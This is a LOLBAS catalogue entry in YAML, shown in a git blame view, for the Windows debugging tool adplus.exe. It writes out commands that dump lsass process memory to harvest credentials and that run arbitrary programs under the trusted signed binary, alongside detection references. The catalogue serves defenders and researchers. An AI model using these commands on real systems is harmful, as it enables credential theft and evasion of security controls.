LOLBAS/yml/OtherMSBinaries/Adplus.yml

52 lines
2.2 KiB
YAML
Raw Normal View History

2021-01-09 08:56:32 +01:00
---
Name: adplus.exe
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-09-01
2021-01-09 08:56:32 +01:00
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
2021-01-09 09:00:05 +01:00
Category: Dump
2021-01-09 08:56:32 +01:00
Privileges: SYSTEM
2021-11-05 21:35:58 +01:00
MitreID: T1003.001
2021-01-09 08:56:32 +01:00
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: All windows
2021-01-09 08:56:32 +01:00
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
2021-11-05 19:58:26 +01:00
Code_Sample:
- Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
2021-11-05 19:58:26 +01:00
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
2021-01-09 08:56:32 +01:00
Resources:
- Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
- Link: https://twitter.com/nas_bench/status/1534916659676422152
- Link: https://twitter.com/nas_bench/status/1534915321856917506
2021-01-09 08:56:32 +01:00
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'